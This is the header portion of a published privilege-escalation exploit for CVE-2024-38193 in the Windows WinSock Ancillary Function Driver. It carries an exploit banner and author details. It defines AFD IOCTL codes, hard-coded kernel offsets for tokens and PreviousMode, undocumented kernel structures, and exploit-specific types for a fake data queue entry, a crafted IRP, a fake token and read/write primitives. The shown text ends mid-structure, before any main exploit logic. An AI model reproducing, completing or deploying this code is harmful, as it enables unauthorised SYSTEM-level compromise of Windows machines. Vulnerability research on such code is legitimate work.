# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
# Date: 2025-05-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-38193
#pragma once
#include "ntstatus.h"
#include "Windows.h"
#include <iostream>
#pragma comment(lib, "ntdll.lib")
#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))
#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"
#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8
#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE
typedef struct IO_STATUS_BLOCK
{
union
{
DWORD Status;
PVOID Pointer;
};
DWORD* Information;
};
//0x4 bytes (sizeof)
struct _SYSTEM_POWER_STATE_CONTEXT
{
union
{
struct
{
ULONG Reserved1 : 8; //0x0
ULONG TargetSystemState : 4; //0x0
ULONG EffectiveSystemState : 4; //0x0
ULONG CurrentSystemState : 4; //0x0
ULONG IgnoreHibernationPath : 1; //0x0
ULONG PseudoTransition : 1; //0x0
ULONG KernelSoftReboot : 1; //0x0
ULONG DirectedDripsTransition : 1; //0x0
ULONG Reserved2 : 8; //0x0
};
ULONG ContextAsUlong; //0x0
};
};
//0x4 bytes (sizeof)
union _POWER_STATE
{
enum _SYSTEM_POWER_STATE SystemState; //0x0
enum _DEVICE_POWER_STATE DeviceState; //0x0
};
//0x48 bytes (sizeof)
typedef struct _IO_STACK_LOCATION
{
UCHAR MajorFunction; //0x0
UCHAR MinorFunction; //0x1
UCHAR Flags; //0x2
UCHAR Control; //0x3
union
{
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT FileAttributes; //0x18
USHORT ShareAccess; //0x1a
ULONG EaLength; //0x20
} Create; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
} CreatePipe; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
} CreateMailslot; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Read; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Write; //0x8
struct
{
ULONG Length; //0x8
struct _UNICODE_STRING* FileName; //0x10
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
ULONG FileIndex; //0x20
} QueryDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
} NotifyDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
DirectoryNotifyInformationClass; //0x18
} NotifyDirectoryEx; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
} QueryFile; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
struct _FILE_OBJECT* FileObject; //0x18
union
{
struct
{
UCHAR ReplaceIfExists; //0x20
UCHAR AdvanceOnly; //0x21
};
ULONG ClusterCount; //0x20
VOID* DeleteHandle; //0x20
};
} SetFile; //0x8
struct
{
ULONG Length; //0x8
VOID* EaList; //0x10
ULONG EaListLength; //0x18
ULONG EaIndex; //0x20
} QueryEa; //0x8
struct
{
ULONG Length; //0x8
} SetEa; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} QueryVolume; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} SetVolume; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG FsControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} FileSystemControl; //0x8
struct
{
union _LARGE_INTEGER* Length; //0x8
ULONG Key; //0x10
union _LARGE_INTEGER ByteOffset; //0x18
} LockControl; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG IoControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} DeviceIoControl; //0x8
struct
{
ULONG SecurityInformation; //0x8
ULONG Length; //0x10
} QuerySecurity; //0x8
struct
{
ULONG SecurityInformation; //0x8
VOID* SecurityDescriptor; //0x10
} SetSecurity; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} MountVolume; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} VerifyVolume; //0x8
struct
{
struct _SCSI_REQUEST_BLOCK* Srb; //0x8
} Scsi; //0x8
struct
{
ULONG Length; //0x8
VOID* StartSid; //0x10
struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
ULONG SidListLength; //0x20
} QueryQuota; //0x8
struct
{
ULONG Length; //0x8
} SetQuota; //0x8
struct
{
enum _DEVICE_RELATION_TYPE Type; //0x8
} QueryDeviceRelations; //0x8
struct
{
struct _GUID* InterfaceType; //0x8
USHORT Size; //0x10
USHORT Version; //0x12
struct _INTERFACE* Interface; //0x18
VOID* InterfaceSpecificData; //0x20
} QueryInterface; //0x8
struct
{
struct _DEVICE_CAPABILITIES* Capabilities; //0x8
} DeviceCapabilities; //0x8
struct
{
struct _IO_RESOURCE_REQUIREMENTS_LIST*
IoResourceRequirementList; //0x8
} FilterResourceRequirements; //0x8
struct
{
ULONG WhichSpace; //0x8
VOID* Buffer; //0x10
ULONG Offset; //0x18
ULONG Length; //0x20
} ReadWriteConfig; //0x8
struct
{
UCHAR Lock; //0x8
} SetLock; //0x8
struct
{
enum BUS_QUERY_ID_TYPE IdType; //0x8
} QueryId; //0x8
struct
{
enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
ULONG LocaleId; //0x10
} QueryDeviceText; //0x8
struct
{
UCHAR InPath; //0x8
UCHAR Reserved[3]; //0x9
enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
} UsageNotification; //0x8
struct
{
enum _SYSTEM_POWER_STATE PowerState; //0x8
} WaitWake; //0x8
struct
{
struct _POWER_SEQUENCE* PowerSequence; //0x8
} PowerSequence; //0x8
struct
{
union
{
ULONG SystemContext; //0x8
struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;
//0x8
};
enum _POWER_STATE_TYPE Type; //0x10
union _POWER_STATE State; //0x18
enum POWER_ACTION ShutdownType; //0x20
} Power; //0x8
struct
{
struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
} StartDevice; //0x8
struct
{
ULONGLONG ProviderId; //0x8
VOID* DataPath; //0x10
ULONG BufferSize; //0x18
VOID* Buffer; //0x20
} WMI; //0x8
struct
{
VOID* Argument1; //0x8
VOID* Argument2; //0x10
VOID* Argument3; //0x18
VOID* Argument4; //0x20
} Others; //0x8
} Parameters; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x28
struct _FILE_OBJECT* FileObject; //0x30
LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*
arg2, VOID* arg3); //0x38
VOID* Context; //0x40
}IO_STACK_LOCATION;
//0x18 bytes (sizeof)
struct _KDEVICE_QUEUE_ENTRY
{
struct _LIST_ENTRY DeviceListEntry; //0x0
ULONG SortKey; //0x10
UCHAR Inserted; //0x14
};
//0x58 bytes (sizeof)
struct _KAPC
{
UCHAR Type; //0x0
UCHAR AllFlags; //0x1
UCHAR Size; //0x2
UCHAR SpareByte1; //0x3
ULONG SpareLong0; //0x4
struct _KTHREAD* Thread; //0x8
struct _LIST_ENTRY ApcListEntry; //0x10
VOID* Reserved[3]; //0x20
VOID* NormalContext; //0x38
VOID* SystemArgument1; //0x40
VOID* SystemArgument2; //0x48
CHAR ApcStateIndex; //0x50
CHAR ApcMode; //0x51
UCHAR Inserted; //0x52
};
//0xd0 bytes (sizeof)
struct _IRP
{
SHORT Type; //0x0
USHORT Size; //0x2
USHORT AllocationProcessorNumber; //0x4
USHORT Reserved; //0x6
struct _MDL* MdlAddress; //0x8
ULONG Flags; //0x10
union
{
struct _IRP* MasterIrp; //0x18
LONG IrpCount; //0x18
VOID* SystemBuffer; //0x18
} AssociatedIrp; //0x18
struct _LIST_ENTRY ThreadListEntry; //0x20
struct IO_STATUS_BLOCK IoStatus; //0x30
CHAR RequestorMode; //0x40
UCHAR PendingReturned; //0x41
CHAR StackCount; //0x42
CHAR CurrentLocation; //0x43
UCHAR Cancel; //0x44
UCHAR CancelIrql; //0x45
CHAR ApcEnvironment; //0x46
UCHAR AllocationFlags; //0x47
union
{
struct _IO_STATUS_BLOCK* UserIosb; //0x48
VOID* IoRingContext; //0x48
};
struct _KEVENT* UserEvent; //0x50
union
{
struct
{
union
{
VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*
arg2, ULONG arg3); //0x58
VOID* IssuingProcess; //0x58
};
union
{
VOID* UserApcContext; //0x60
struct _IORING_OBJECT* IoRing; //0x60
};
} AsynchronousParameters; //0x58
union _LARGE_INTEGER AllocationSize; //0x58
} Overlay; //0x58
VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);
//0x68
VOID* UserBuffer; //0x70
union
{
struct
{
union
{
struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
VOID* DriverContext[4]; //0x78
};
struct _ETHREAD* Thread; //0x98
CHAR* AuxiliaryBuffer; //0xa0
struct _LIST_ENTRY ListEntry; //0xa8
union
{
struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
ULONG PacketType; //0xb8
};
struct _FILE_OBJECT* OriginalFileObject; //0xc0
VOID* IrpExtension; //0xc8
} Overlay; //0x78
struct _KAPC Apc; //0x78
VOID* CompletionKey; //0x78
} Tail; //0x78
};
typedef struct _TA_ADDRESS
{
USHORT AddressLength;
USHORT AddressType;
UCHAR Address[1];
}TA_ADDRESS;
typedef struct _TRANSPORT_ADDRESS
{
LONG TAAddressCount;
TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef struct _SYSTEM_MODULE_ENTRY
{
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;
SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
PVOID Object;
ULONG_PTR UniqueProcessId;
ULONG_PTR HandleValue;
ULONG GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
typedef struct _AFD_CREATE_PACKET {
//FILE_FULL_EA_INFORMATION
ULONG NextEntryOffset;
WORD Flags;
UCHAR EaNameLength;
USHORT EaValueLength;
CHAR EaName[15];
//AFD_CREATE_PACKET
ULONG EndpointFlags;
ULONG GroupID;
ULONG AddressFamily;
ULONG SocketType;
ULONG Protocol;
ULONG SizeOfTransportName;
wchar_t TransportName[16];
//UCHAR Unkown;
} AFD_CREATE_PACKET;
enum THREADINFOCLASS { ThreadImpersonationToken = 5 };
enum SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemExtendedHandleInformation = 64
};
typedef enum EVENT_TYPE {
NotificationEvent,
SynchronizationEvent
};
typedef struct _AFD_BIND_DATA {
ULONG ShareType;
SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;
typedef struct alignas(16) MY_AFD_CONNECT_INFO
{
__int64 UseSan;
__int64 hNtSock1;
__int64 Unknown;
__int32 tmp6;
WORD const_16;
sockaddr_in bind;
};
typedef struct FAKE_DATA_ENTRY_QUEUE
{
DWORD tmp;
LIST_ENTRY nextQueue;
__int64 unknown;
PVOID security_client_context;
__int64 unknown2;
__int64 sizeOfData;
char DATA[0x77FD0];
};
typedef struct _AFD_LISTEN_INFO {
ULONG unknown;
__int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;
typedef struct _SECURITY_CLIENT_CONTEXT
{
_SECURITY_QUALITY_OF_SERVICE SecurityQos;
void* ClientToken;
unsigned __int8 DirectlyAccessClientToken;
unsigned __int8 DirectAccessEffectiveOnly;
unsigned __int8 ServerIsRemote;
_TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;
struct __declspec(align(8)) _OWNER_ENTRY
{
unsigned __int64 OwnerThread;
DWORD ___u1;
};
//0x68 bytes (sizeof)
typedef struct _ERESOURCE
{
struct _LIST_ENTRY SystemResourcesList; //0x0
struct _OWNER_ENTRY* OwnerTable; //0x10
SHORT ActiveCount; //0x18
union
{
USHORT Flag; //0x1a
struct
{
UCHAR ReservedLowFlags; //0x1a
UCHAR WaiterPriority; //0x1b
};
};
VOID* SharedWaiters; //0x20
VOID* ExclusiveWaiters; //0x28
struct _OWNER_ENTRY OwnerEntry; //0x30
ULONG ActiveEntries; //0x40
ULONG ContentionCount; //0x44
ULONG NumberOfSharedWaiters; //0x48
ULONG NumberOfExclusiveWaiters; //0x4c
VOID* Reserved2; //0x50
union
{
VOID* Address; //0x58
ULONGLONG CreatorBackTraceIndex; //0x58
};
ULONGLONG SpinLock; //0x60
}ERESOURCE, *PERESOURCE;
//0x8 bytes (sizeof)
typedef struct _EX_PUSH_LOCK
{
union
{
struct
{
ULONGLONG Locked : 1; //0x0
ULONGLONG Waiting : 1; //0x0
ULONGLONG Waking : 1; //0x0
ULONGLONG MultipleShared : 1; //0x0
ULONGLONG Shared : 60; //0x0
};
ULONGLONG Value; //0x0
VOID* Ptr; //0x0
};
};
//0x10 bytes (sizeof)
typedef struct _SEP_CACHED_HANDLES_TABLE
{
struct _EX_PUSH_LOCK Lock; //0x0
struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
};
//0x8 bytes (sizeof)
typedef struct _EX_RUNDOWN_REF
{
union
{
ULONGLONG Count; //0x0
VOID* Ptr; //0x0
};
};
//0x20 bytes (sizeof)
typedef struct _OB_HANDLE_REVOCATION_BLOCK
{
struct _LIST_ENTRY RevocationInfos; //0x0
struct _EX_PUSH_LOCK Lock; //0x10
struct _EX_RUNDOWN_REF Rundown; //0x18
};
//0xc0 bytes (sizeof)
typedef struct _SEP_LOGON_SESSION_REFERENCES
{
struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
struct _LUID LogonId; //0x8
struct _LUID BuddyLogonId; //0x10
LONGLONG ReferenceCount; //0x18
ULONG Flags; //0x20
struct _DEVICE_MAP* pDeviceMap; //0x28
VOID* Token; //0x30
struct _UNICODE_STRING AccountName; //0x38
struct _UNICODE_STRING AuthorityName; //0x48
struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
struct _EX_PUSH_LOCK SharedDataLock; //0x68
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;
//0x70
struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
struct _EJOB* ServerSilo; //0xa0
struct _LUID SiblingAuthId; //0xa8
struct _LIST_ENTRY TokenList; //0xb0
};
//0x30 bytes (sizeof)
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
{
ULONG SecurityAttributeCount; //0x0
struct _LIST_ENTRY SecurityAttributesList; //0x8
ULONG WorkingSecurityAttributeCount; //0x18
struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;
//0x20 bytes (sizeof)
typedef struct _SEP_SID_VALUES_BLOCK
{
ULONG BlockLength; //0x0
LONGLONG ReferenceCount; //0x8
ULONG SidCount; //0x10
ULONGLONG SidValuesStart; //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;
//0x18 bytes (sizeof)
struct _SEP_TOKEN_PRIVILEGES
{
ULONGLONG Present; //0x0
ULONGLONG Enabled; //0x8
ULONGLONG EnabledByDefault; //0x10
};
//0x1f bytes (sizeof)
struct _SEP_AUDIT_POLICY
{
struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
UCHAR PolicySetStatus; //0x1e
};
//0x498 bytes (sizeof)
struct _TOKEN
{
struct _TOKEN_SOURCE TokenSource; //0x0
struct _LUID TokenId; //0x10
struct _LUID AuthenticationId; //0x18
struct _LUID ParentTokenId; //0x20
union _LARGE_INTEGER ExpirationTime; //0x28
struct _ERESOURCE* TokenLock; //0x30
struct _LUID ModifiedId; //0x38
struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
ULONG SessionId; //0x78
ULONG UserAndGroupCount; //0x7c
ULONG RestrictedSidCount; //0x80
ULONG VariableLength; //0x84
ULONG DynamicCharged; //0x88
ULONG DynamicAvailable; //0x8c
ULONG DefaultOwnerIndex; //0x90
struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
VOID* PrimaryGroup; //0xa8
ULONG* DynamicPart; //0xb0
struct _ACL* DefaultDacl; //0xb8
enum _TOKEN_TYPE TokenType; //0xc0
enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
ULONG TokenFlags; //0xc8
UCHAR TokenInUse; //0xcc
ULONG IntegrityLevelIndex; //0xd0
ULONG MandatoryPolicy; //0xd4
void* LogonSession; //0xd8
struct _LUID OriginatingLogonSession; //0xe0
struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*
pSecurityAttributes; //0x308
VOID* Package; //0x310
struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
ULONG CapabilityCount; //0x320
struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;
//0x448
VOID* TrustLevelSid; //0x450
struct _TOKEN* TrustLinkedToken; //0x458
VOID* IntegrityLevelSidValue; //0x460
struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
VOID* SessionObject; //0x488
ULONGLONG VariablePart; //0x490
};
//0x38 bytes (sizeof)
struct _OBJECT_HEADER
{
LONGLONG PointerCount; //0x0
union
{
LONGLONG HandleCount; //0x8
VOID* NextToFree; //0x8
};
struct _EX_PUSH_LOCK Lock; //0x10
UCHAR TypeIndex; //0x18
union
{
UCHAR TraceFlags; //0x19
struct
{
UCHAR DbgRefTrace : 1; //0x19
UCHAR DbgTracePermanent : 1; //0x19
};
};
UCHAR InfoMask; //0x1a
union
{
UCHAR Flags; //0x1b
struct
{
UCHAR NewObject : 1; //0x1b
UCHAR KernelObject : 1; //0x1b
UCHAR KernelOnlyAccess : 1; //0x1b
UCHAR ExclusiveObject : 1; //0x1b
UCHAR PermanentObject : 1; //0x1b
UCHAR DefaultSecurityQuota : 1; //0x1b
UCHAR SingleHandleEntry : 1; //0x1b
UCHAR DeletedInline : 1; //0x1b
};
};
ULONG Reserved; //0x1c
union
{
struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
VOID* QuotaBlockCharged; //0x20
};
VOID* SecurityDescriptor; //0x28
struct _TOKEN Body; //0x30
};
struct mm {
void* fake_data_entry;
void* input;
_IRP* crafted_irp;
IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
void* p_mem_0x30;
void* p_mem_0xD0_2;
_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
ACL* VariablePartDefaultDacl;
ACL* VariablePartDefaultDacl2;
_ERESOURCE* TokenLock;
void* PrimaryGroup;
int sizeOfClientTokenAndObjectHeader;
PSEP_SID_VALUES_BLOCK TokenSidValues;
_SECURITY_CLIENT_CONTEXT* security_client_context;
_SEP_LOGON_SESSION_REFERENCES* LogonSession;
_TOKEN* fakeToken;
void *pipe_100_im_control_block;
void* pipe_100_rw_control_block;
void* p_mem_Pipe_hToPipe_1000_rw;
void* p_mem_Pipe_hToPipe_1000_rw_2;
HANDLE hPipeIM;
HANDLE hPipeRW;
HANDLE hFileIM;
HANDLE hFileRW;
HANDLE IncPrimitiveTOKEN;
HANDLE RWPrimitiveTOKEN;
};
//0x18 bytes (sizeof)
struct _DISPATCHER_HEADER
{
union
{
volatile LONG Lock; //0x0
LONG LockNV; //0x0
struct
{
UCHAR Type; //0x0
UCHAR Signalling; //0x1
UCHAR Size; //0x2
UCHAR Reserved1; //0x3
};
struct
{
UCHAR TimerType; //0x0
union
{
UCHAR TimerControlFlags; //0x1
struct
{
UCHAR Absolute : 1;